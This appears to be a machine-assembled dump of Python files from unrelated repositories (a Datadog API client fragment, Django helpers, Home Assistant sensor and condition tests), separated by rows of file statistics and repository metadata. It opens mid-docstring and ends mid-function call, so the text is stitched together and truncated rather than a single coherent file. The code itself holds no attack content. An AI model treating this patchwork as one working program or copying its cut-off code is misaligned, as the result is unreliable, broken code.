>>> thread = api.update_test_pause_status(public_id, body, async_req=True)
>>> result = thread.get()
Args:
public_id (str): The public ID of the Synthetic test to update.
body (SyntheticsUpdateTestPauseStatusPayload): Status to set the given Synthetic test to.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool
If the method is called asynchronously, returns the request
thread.
"""
kwargs = self._update_test_pause_status_endpoint.default_arguments(kwargs)
kwargs["public_id"] = public_id
kwargs["body"] = body
return self._update_test_pause_status_endpoint.call_with_http_info(**kwargs)
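# Illustrative usage sketch (not part of the generated client): the sync vs.
# async_req calling pattern described in the docstrings above, kept as
# commented-out code so nothing runs on import. The import paths, the
# Configuration/ApiClient names, and the public ID are assumptions and
# placeholders; adjust them to your installation.
#
# from datadog_api_client.v1 import ApiClient, Configuration
# from datadog_api_client.v1.api.synthetics_api import SyntheticsApi
#
# with ApiClient(Configuration()) as api_client:
#     api = SyntheticsApi(api_client)
#     # Synchronous call: returns the deserialized model directly.
#     details = api.get_test("abc-123-def")
#     # Asynchronous call: returns a thread; .get() blocks until the result is ready.
#     thread = api.get_test("abc-123-def", async_req=True)
#     details = thread.get()
#     # _request_timeout: a single number is the total timeout, or pass a
#     # (connection, read) tuple as documented above.
#     tests = api.list_tests(_request_timeout=(5, 30))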
| 41.341452 | 120 | 0.536697 | 8,642 | 88,264 | 5.266489 | 0.031243 | 0.029662 | 0.028563 | 0.020873 | 0.914794 | 0.895986 | 0.881397 | 0.86439 | 0.83987 | 0.809615 | 0 | 0.004374 | 0.378297 | 88,264 | 2,134 | 121 | 41.360825 | 0.825036 | 0.441097 | 0 | 0.667565 | 0 | 0 | 0.219011 | 0.042833 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02336 | false | 0 | 0.020665 | 0 | 0.067385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f414184bcd7915c37994fec124f59c393ff76c40 | 138 | py | Python | env/lib/python3.4/site-packages/django_extensions/management/technical_response.py | dj-amadeous/deficit | cd086acd2165c96d3d0ed9c53fbc98da33afa83d | [
"MIT"
] | null | null | null | env/lib/python3.4/site-packages/django_extensions/management/technical_response.py | dj-amadeous/deficit | cd086acd2165c96d3d0ed9c53fbc98da33afa83d | [
"MIT"
] | null | null | null | env/lib/python3.4/site-packages/django_extensions/management/technical_response.py | dj-amadeous/deficit | cd086acd2165c96d3d0ed9c53fbc98da33afa83d | [
"MIT"
] | null | null | null | import six
def null_technical_500_response(request, exc_type, exc_value, tb, status_code=500):
six.reraise(exc_type, exc_value, tb)
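# Usage note: this helper is a drop-in replacement for Django's debug view that
# simply re-raises, so unhandled exceptions propagate to an outer debugger
# (for example Werkzeug's, as used by runserver_plus) instead of being rendered
# as Django's technical 500 page. A minimal sketch of how it might be wired up;
# the exact hook point is an assumption:
#
# from django.views import debug
# from django_extensions.management.technical_response import null_technical_500_response
# debug.technical_500_response = null_technical_500_response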
| 23 | 83 | 0.782609 | 23 | 138 | 4.347826 | 0.652174 | 0.14 | 0.2 | 0.3 | 0.34 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049587 | 0.123188 | 138 | 5 | 84 | 27.6 | 0.77686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
be37f9c2e898f641d2e9ac161f365ab8221fcf9f | 10,003 | py | Python | tests/components/august/test_sensor.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 1 | 2021-07-08T20:09:55.000Z | 2021-07-08T20:09:55.000Z | tests/components/august/test_sensor.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 47 | 2021-02-21T23:43:07.000Z | 2022-03-31T06:07:10.000Z | tests/components/august/test_sensor.py | OpenPeerPower/core | f673dfac9f2d0c48fa30af37b0a99df9dd6640ee | [
"Apache-2.0"
] | null | null | null | """The sensor tests for the august platform."""
from openpeerpower.const import ATTR_UNIT_OF_MEASUREMENT, PERCENTAGE, STATE_UNKNOWN
from openpeerpower.helpers import entity_registry as er
from tests.components.august.mocks import (
_create_august_with_devices,
_mock_activities_from_fixture,
_mock_doorbell_from_fixture,
_mock_doorsense_enabled_august_lock_detail,
_mock_lock_from_fixture,
)
async def test_create_doorbell(opp):
"""Test creation of a doorbell."""
doorbell_one = await _mock_doorbell_from_fixture(opp, "get_doorbell.json")
await _create_august_with_devices(opp, [doorbell_one])
sensor_k98gidt45gul_name_battery = opp.states.get(
"sensor.k98gidt45gul_name_battery"
)
assert sensor_k98gidt45gul_name_battery.state == "96"
assert (
sensor_k98gidt45gul_name_battery.attributes["unit_of_measurement"] == PERCENTAGE
)
async def test_create_doorbell_offline(opp):
"""Test creation of a doorbell that is offline."""
doorbell_one = await _mock_doorbell_from_fixture(opp, "get_doorbell.offline.json")
await _create_august_with_devices(opp, [doorbell_one])
entity_registry = er.async_get(opp)
sensor_tmt100_name_battery = opp.states.get("sensor.tmt100_name_battery")
assert sensor_tmt100_name_battery.state == "81"
assert sensor_tmt100_name_battery.attributes["unit_of_measurement"] == PERCENTAGE
entry = entity_registry.async_get("sensor.tmt100_name_battery")
assert entry
assert entry.unique_id == "tmt100_device_battery"
async def test_create_doorbell_hardwired(opp):
"""Test creation of a doorbell that is hardwired without a battery."""
doorbell_one = await _mock_doorbell_from_fixture(opp, "get_doorbell.nobattery.json")
await _create_august_with_devices(opp, [doorbell_one])
sensor_tmt100_name_battery = opp.states.get("sensor.tmt100_name_battery")
assert sensor_tmt100_name_battery is None
async def test_create_lock_with_linked_keypad(opp):
"""Test creation of a lock with a linked keypad that both have a battery."""
lock_one = await _mock_lock_from_fixture(opp, "get_lock.doorsense_init.json")
await _create_august_with_devices(opp, [lock_one])
entity_registry = er.async_get(opp)
sensor_a6697750d607098bae8d6baa11ef8063_name_battery = opp.states.get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert sensor_a6697750d607098bae8d6baa11ef8063_name_battery.state == "88"
assert (
sensor_a6697750d607098bae8d6baa11ef8063_name_battery.attributes[
"unit_of_measurement"
]
== PERCENTAGE
)
entry = entity_registry.async_get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert entry
assert entry.unique_id == "A6697750D607098BAE8D6BAA11EF8063_device_battery"
state = opp.states.get("sensor.front_door_lock_keypad_battery")
assert state.state == "60"
assert state.attributes[ATTR_UNIT_OF_MEASUREMENT] == PERCENTAGE
entry = entity_registry.async_get("sensor.front_door_lock_keypad_battery")
assert entry
assert entry.unique_id == "5bc65c24e6ef2a263e1450a8_linked_keypad_battery"
async def test_create_lock_with_low_battery_linked_keypad(opp):
"""Test creation of a lock with a linked keypad that both have a battery."""
lock_one = await _mock_lock_from_fixture(opp, "get_lock.low_keypad_battery.json")
await _create_august_with_devices(opp, [lock_one])
entity_registry = er.async_get(opp)
sensor_a6697750d607098bae8d6baa11ef8063_name_battery = opp.states.get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert sensor_a6697750d607098bae8d6baa11ef8063_name_battery.state == "88"
assert (
sensor_a6697750d607098bae8d6baa11ef8063_name_battery.attributes[
"unit_of_measurement"
]
== PERCENTAGE
)
entry = entity_registry.async_get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_battery"
)
assert entry
assert entry.unique_id == "A6697750D607098BAE8D6BAA11EF8063_device_battery"
state = opp.states.get("sensor.front_door_lock_keypad_battery")
assert state.state == "10"
assert state.attributes[ATTR_UNIT_OF_MEASUREMENT] == PERCENTAGE
entry = entity_registry.async_get("sensor.front_door_lock_keypad_battery")
assert entry
assert entry.unique_id == "5bc65c24e6ef2a263e1450a8_linked_keypad_battery"
# No activity means the operator will be unknown until someone unlocks/locks it
lock_operator_sensor = entity_registry.async_get(
"sensor.a6697750d607098bae8d6baa11ef8063_name_operator"
)
assert (
lock_operator_sensor.unique_id
== "A6697750D607098BAE8D6BAA11EF8063_lock_operator"
)
assert (
opp.states.get("sensor.a6697750d607098bae8d6baa11ef8063_name_operator").state
== STATE_UNKNOWN
)
async def test_lock_operator_bluetooth(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(
opp, "get_activity.lock_from_bluetooth.json"
)
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Your favorite elven princess"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "mobile"
)
async def test_lock_operator_keypad(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(
opp, "get_activity.lock_from_keypad.json"
)
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Your favorite elven princess"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is True
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "keypad"
)
async def test_lock_operator_remote(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(opp, "get_activity.lock.json")
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Your favorite elven princess"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is True
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "remote"
)
async def test_lock_operator_autorelock(opp):
"""Test operation of a lock with doorsense and bridge."""
lock_one = await _mock_doorsense_enabled_august_lock_detail(opp)
activities = await _mock_activities_from_fixture(
opp, "get_activity.lock_from_autorelock.json"
)
await _create_august_with_devices(opp, [lock_one], activities=activities)
entity_registry = er.async_get(opp)
lock_operator_sensor = entity_registry.async_get(
"sensor.online_with_doorsense_name_operator"
)
assert lock_operator_sensor
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").state
== "Auto Relock"
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"remote"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"keypad"
]
is False
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"autorelock"
]
is True
)
assert (
opp.states.get("sensor.online_with_doorsense_name_operator").attributes[
"method"
]
== "autorelock"
)
| 33.680135 | 88 | 0.707988 | 1,143 | 10,003 | 5.798775 | 0.093613 | 0.051599 | 0.050694 | 0.076041 | 0.902836 | 0.857121 | 0.821666 | 0.808992 | 0.782136 | 0.775196 | 0 | 0.050639 | 0.210337 | 10,003 | 296 | 89 | 33.793919 | 0.788454 | 0.011397 | 0 | 0.582329 | 0 | 0 | 0.258423 | 0.222056 | 0 | 0 | 0 | 0 | 0.196787 | 1 | 0 | false | 0 | 0.012048 | 0 | 0.012048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be672f964354c5659e44cf1dea9227e2f680dbdd | 195 | py | Python | supersaver/util/__init__.py | ftkghost/SuperSaver | 04d1f19c309b35b540f056ad9a4796225f97cb76 | [
"BSD-2-Clause"
] | null | null | null | supersaver/util/__init__.py | ftkghost/SuperSaver | 04d1f19c309b35b540f056ad9a4796225f97cb76 | [
"BSD-2-Clause"
] | 1 | 2018-08-12T12:50:17.000Z | 2018-08-12T12:50:17.000Z | supersaver/util/__init__.py | ftkghost/supersaver | 04d1f19c309b35b540f056ad9a4796225f97cb76 | [
"BSD-2-Clause"
] | null | null | null | from core.model import Site
from sca.settings import SITE_NAME, SITE_DOMAIN
def get_site():
return Site(SITE_NAME, SITE_DOMAIN)
def get_in_app_url():
return "nz.co.scamedia://from-web" | 21.666667 | 47 | 0.753846 | 33 | 195 | 4.212121 | 0.575758 | 0.143885 | 0.172662 | 0.258993 | 0.345324 | 0.345324 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14359 | 195 | 9 | 48 | 21.666667 | 0.832335 | 0 | 0 | 0 | 0 | 0 | 0.127551 | 0.127551 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 6 |
be818590a71781156c1211ee3e9c001374b0255d | 58 | py | Python | apps/local_apps/account/context_processors.py | google-code-export/django-hotclub | d783a5bbcc06816289565f3eae6d99461188ca4a | [
"MIT"
] | 4 | 2016-04-10T13:37:58.000Z | 2018-06-11T18:49:29.000Z | apps/local_apps/account/context_processors.py | pombreda/django-hotclub | d783a5bbcc06816289565f3eae6d99461188ca4a | [
"MIT"
] | null | null | null | apps/local_apps/account/context_processors.py | pombreda/django-hotclub | d783a5bbcc06816289565f3eae6d99461188ca4a | [
"MIT"
] | 3 | 2017-07-09T02:14:54.000Z | 2021-07-13T19:16:59.000Z | def openid(request):
return {'openid': request.openid} | 29 | 37 | 0.706897 | 7 | 58 | 5.857143 | 0.571429 | 0.634146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 58 | 2 | 37 | 29 | 0.82 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
fe2220f257bdd2de8ac19436b8f3be9e5da499b4 | 33 | py | Python | sneakers/__init__.py | michalkoczwara/sneaky-creeper | b398af8701d51b8b3a4baf37cdaa16de3d3649d1 | [
"MIT"
] | 146 | 2015-04-02T23:25:07.000Z | 2022-02-17T17:37:33.000Z | sneakers/__init__.py | michalkoczwara/sneaky-creeper | b398af8701d51b8b3a4baf37cdaa16de3d3649d1 | [
"MIT"
] | 90 | 2015-04-23T23:33:11.000Z | 2021-06-01T21:58:35.000Z | sneakers/__init__.py | michalkoczwara/sneaky-creeper | b398af8701d51b8b3a4baf37cdaa16de3d3649d1 | [
"MIT"
] | 29 | 2015-08-08T20:38:09.000Z | 2021-06-29T19:06:13.000Z | from sneakers.exfil import Exfil
| 16.5 | 32 | 0.848485 | 5 | 33 | 5.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fe22caae49b802d2e8ad54ad241763b2b2877820 | 46 | py | Python | src/syfervision/transforms/__init__.py | Bhuvan-21/SyferText | 6bf972c78c7ac7de8b1448b4515501b8e5b2b2f5 | [
"Apache-2.0"
] | null | null | null | src/syfervision/transforms/__init__.py | Bhuvan-21/SyferText | 6bf972c78c7ac7de8b1448b4515501b8e5b2b2f5 | [
"Apache-2.0"
] | null | null | null | src/syfervision/transforms/__init__.py | Bhuvan-21/SyferText | 6bf972c78c7ac7de8b1448b4515501b8e5b2b2f5 | [
"Apache-2.0"
] | null | null | null | from .image_modelling import ToTensor, Resize
| 23 | 45 | 0.847826 | 6 | 46 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 46 | 1 | 46 | 46 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2290ce9f679bbcba130396e26d42e363e84d2c40 | 91,958 | py | Python | tests/helpers/test_condition.py | pbozeman/core | 10dccc673437db223b94eff8a7b6f1990d100c85 | [
"Apache-2.0"
] | 2 | 2020-03-29T05:32:57.000Z | 2021-06-13T06:55:05.000Z | tests/helpers/test_condition.py | pbozeman/core | 10dccc673437db223b94eff8a7b6f1990d100c85 | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | tests/helpers/test_condition.py | pbozeman/core | 10dccc673437db223b94eff8a7b6f1990d100c85 | [
"Apache-2.0"
] | null | null | null | """Test the condition helper."""
from datetime import datetime
from unittest.mock import patch
import pytest
from homeassistant.components import sun
import homeassistant.components.automation as automation
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
from homeassistant.exceptions import ConditionError, HomeAssistantError
from homeassistant.helpers import condition, trace
from homeassistant.helpers.template import Template
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import async_mock_service
ORIG_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
hass.config.set_time_zone(hass.config.time_zone)
hass.loop.run_until_complete(
async_setup_component(hass, sun.DOMAIN, {sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
)
def teardown():
"""Restore."""
dt_util.set_default_time_zone(ORIG_TIME_ZONE)
def assert_element(trace_element, expected_element, path):
"""Assert a trace element is as expected.
Note: Unused variable 'path' is passed to get helpful errors from pytest.
"""
expected_result = expected_element.get("result", {})
# Check that every item in expected_element is present and equal in trace_element
# The redundant set operation gives helpful errors from pytest
assert not set(expected_result) - set(trace_element._result or {})
for result_key, result in expected_result.items():
assert trace_element._result[result_key] == result
# Check for unexpected items in trace_element
assert not set(trace_element._result or {}) - set(expected_result)
if "error_type" in expected_element:
assert isinstance(trace_element._error, expected_element["error_type"])
else:
assert trace_element._error is None
@pytest.fixture(autouse=True)
def prepare_condition_trace():
"""Clear previous trace."""
trace.trace_clear()
def assert_condition_trace(expected):
"""Assert a trace condition sequence is as expected."""
condition_trace = trace.trace_get(clear=False)
trace.trace_clear()
expected_trace_keys = list(expected.keys())
assert list(condition_trace.keys()) == expected_trace_keys
for trace_key_index, key in enumerate(expected_trace_keys):
assert len(condition_trace[key]) == len(expected[key])
for index, element in enumerate(expected[key]):
path = f"[{trace_key_index}][{index}]"
assert_element(condition_trace[key][index], element, path)
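# Note on the expected-trace dicts used in the tests below: each key is a
# condition trace path -- "" is the top-level condition, "conditions/<n>" the
# n-th subcondition, and "conditions/<n>/entity_id/<m>" the evaluation of the
# m-th entity within that subcondition -- and each value is the list of trace
# elements expected at that path.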
async def test_invalid_condition(hass):
"""Test if invalid condition raises."""
with pytest.raises(HomeAssistantError):
await condition.async_from_config(
hass,
{
"condition": "invalid",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
],
},
)
async def test_and_condition(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "And Condition",
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "120", "wanted_state": "100"}}
],
}
)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "105", "wanted_state": "100"}}
],
}
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": True}}],
"conditions/0/entity_id/0": [
{"result": {"result": True, "state": "100", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 100.0}}],
}
)
async def test_and_condition_raises(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "And Condition",
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature2",
"above": 110,
},
],
},
)
# All subconditions raise, the AND-condition should raise
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
# The first subcondition raises, the second returns True, the AND-condition
# should raise
hass.states.async_set("sensor.temperature2", 120)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 120.0}}],
}
)
# The first subcondition raises, the second returns False, the AND-condition
# should return False
hass.states.async_set("sensor.temperature2", 90)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 90.0,
"wanted_state_above": 110.0,
}
}
],
}
)
async def test_and_condition_with_template(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "Template Condition",
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [
{"result": {"entities": ["sensor.temperature"], "result": False}}
],
}
)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_or_condition(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "Or Condition",
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
assert_condition_trace(
{
"": [{"result": {"result": False}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "120", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 120.0,
"wanted_state_below": 110.0,
}
}
],
}
)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": False}}],
"conditions/0/entity_id/0": [
{"result": {"result": False, "state": "105", "wanted_state": "100"}}
],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 105.0}}],
}
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"result": {"result": True}}],
"conditions/0/entity_id/0": [
{"result": {"result": True, "state": "100", "wanted_state": "100"}}
],
}
)
async def test_or_condition_raises(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"alias": "Or Condition",
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature2",
"above": 110,
},
],
},
)
# All subconditions raise, the OR-condition should raise
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"error_type": ConditionError}],
"conditions/1/entity_id/0": [{"error_type": ConditionError}],
}
)
# The first subcondition raises, the second returns False, the OR-condition
# should raise
hass.states.async_set("sensor.temperature2", 100)
with pytest.raises(ConditionError):
test(hass)
assert_condition_trace(
{
"": [{"error_type": ConditionError}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": False}}],
"conditions/1/entity_id/0": [
{
"result": {
"result": False,
"state": 100.0,
"wanted_state_above": 110.0,
}
}
],
}
)
# The first subcondition raises, the second returns True, the OR-condition
# should return True
hass.states.async_set("sensor.temperature2", 120)
assert test(hass)
assert_condition_trace(
{
"": [{"result": {"result": True}}],
"conditions/0": [{"error_type": ConditionError}],
"conditions/0/entity_id/0": [{"error_type": ConditionError}],
"conditions/1": [{"result": {"result": True}}],
"conditions/1/entity_id/0": [{"result": {"result": True, "state": 120.0}}],
}
)
async def test_or_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "or",
"conditions": [
{'{{ states.sensor.temperature.state == "100" }}'},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_not_condition(hass):
"""Test the 'not' condition."""
test = await condition.async_from_config(
hass,
